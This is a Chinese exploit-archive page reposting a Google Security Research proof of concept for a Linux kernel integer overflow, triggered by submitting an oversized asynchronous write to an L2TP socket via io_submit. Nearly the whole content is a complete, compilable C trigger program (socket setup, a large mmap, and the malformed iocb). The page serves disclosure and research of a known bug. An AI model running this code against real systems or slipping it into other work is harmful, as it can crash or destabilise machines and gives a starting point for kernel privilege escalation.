首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux io_submit L2TP Sendmsg Integer Overflow
来源:Google Security Research 作者:hawkes 发布时间:2016-02-25  

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/aio_abi.h>

int main(int argc, char *argv[]) {
 struct sockaddr_pppol2tp sax;
 struct sockaddr_in addr;
 int s, sfd, ret;
 struct iocb *iocbp;
 struct iocb iocb;
 aio_context_t ctx_id = 0;
 void *data;

 s = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);

 if (s == -1) {
  perror("socket");
  return -1;
 }

 memset(&sax, 0, sizeof(struct sockaddr_pppol2tp));

 sax.sa_family = AF_PPPOX;
 sax.sa_protocol = PX_PROTO_OL2TP;

 sax.pppol2tp.fd = -1;
 sax.pppol2tp.addr.sin_addr.s_addr = addr.sin_addr.s_addr;
 sax.pppol2tp.addr.sin_port = addr.sin_port;
 sax.pppol2tp.addr.sin_family = AF_INET;
 sax.pppol2tp.s_tunnel  = -1;
 sax.pppol2tp.s_session = 0;
 sax.pppol2tp.d_tunnel  = -1;
 sax.pppol2tp.d_session = 0;

 sfd = connect(s, (struct sockaddr *)&sax, sizeof(sax));

 if (sfd == -1) {
  perror("connect");
  return -1;
 }

 data = mmap(NULL, 0x100001000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);

 if (data == MAP_FAILED) {
  perror("mmap");
  return -1;
 }

 memset(data, 0x41, 0x100001000);

 ret = syscall(__NR_io_setup, 2, &ctx_id);

 if (ret == -1) {
  perror("io_setup");
  return -1;
 }

 memset(&iocb, 0, sizeof(struct iocb));

 iocb.aio_fildes = s;
 iocb.aio_lio_opcode = IOCB_CMD_PWRITE;
 iocb.aio_nbytes = 0xfffffe60;
 iocb.aio_buf = (unsigned long) &data;

 iocbp = &iocb;

 syscall(__NR_io_submit, ctx_id, 1, &iocbp);

 return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·libquicktime 1.2.4 - Integer O
·Proxmox VE 3/4 Insecure Hostna
·Core FTP Server 1.2 - Buffer O
·GpicView 0.2.5 - Crash PoC
·Adobe Cross Site Scripting / O
·Qualcomm Adreno GPU MSM Driver
·QuickHeal 16.00 - webssx.sys D
·Centreon 2.5.3 Code Execution
·STIMS Cutter - Buffer Overflow
·Comodo Anti-Virus SHFolder.DLL
·STIMS Buffer - Buffer Overflow
·ASAN/SUID Local Root Exploit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved